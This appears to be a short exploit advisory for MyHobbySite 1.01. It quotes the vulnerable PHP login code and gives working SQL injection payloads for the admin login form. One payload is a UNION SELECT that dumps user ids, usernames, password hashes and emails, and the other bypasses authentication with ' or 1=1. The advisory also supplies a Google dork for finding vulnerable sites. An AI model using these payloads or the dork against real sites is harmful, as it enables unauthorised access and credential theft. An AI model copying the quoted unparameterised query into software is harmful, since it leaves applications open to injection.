46 lines
No EOL
1.9 KiB
Text
46 lines
No EOL
1.9 KiB
Text
#########################################################################################
|
|
# Exploit Title: MyHobbySite 1.01 SQL injection, Bypass Authentication Vulnerability
|
|
# Date: 12-09-2010
|
|
# Author: YuGj VN
|
|
# Email: anhtuanittn.vn@gmail.com
|
|
# Software Link: http://www.myhobbysite.net/index.php?page=15
|
|
# Version: v1.01
|
|
#########################################################################################
|
|
|
|
Bug Code:
|
|
if (isset($_REQUEST['username']) and isset($_REQUEST['password'])) {
|
|
// Get user info from the dataabse
|
|
$_REQUEST['username'] = trim($_REQUEST['username']);
|
|
$_REQUEST['password'] = trim($_REQUEST['password']);
|
|
$usersettings = @mysql_query("SELECT * FROM " . $CONFIG['database_table_prefix'] . "users WHERE username='$_REQUEST[username]' AND password=md5('$_REQUEST[password]')");
|
|
$usersettings = mysql_fetch_array($usersettings);
|
|
if ($usersettings) {
|
|
$_SESSION['logged_in'] = TRUE;
|
|
$_SESSION['userid'] = $usersettings['id'];
|
|
$_SESSION['user'] = $usersettings['username'];
|
|
$_SESSION['pass'] = $usersettings['password'];
|
|
$_SESSION['email'] = $usersettings['email'];
|
|
$_SESSION['permissions'] = $usersettings['permissions'];
|
|
UpdateLogs($usersettings['username'] . " logged into the Admin CP.");
|
|
} else {
|
|
$failed_login = TRUE;
|
|
}
|
|
}
|
|
|
|
#########################################################################################
|
|
|
|
Exploit:
|
|
|
|
link exploit: http://domain.com/admin/
|
|
# Enter in username field: ' union select 1,concat_ws(0x3a,id,username,password,email),3,4,5 from mhs_users-- -
|
|
# Enter in password field: ' union select 1,concat_ws(0x3a,id,username,password,email),3,4,5 from mhs_users-- -
|
|
# or
|
|
# Enter in username field: ' or 1=1-- -
|
|
# Enter in password field: ' or 1=1-- -
|
|
#
|
|
#
|
|
# We can exploit only when magic_quote_gpc = Off
|
|
# Google dork: Powered by MyHobbySite 1.01
|
|
#
|
|
#
|
|
######################################################################################### |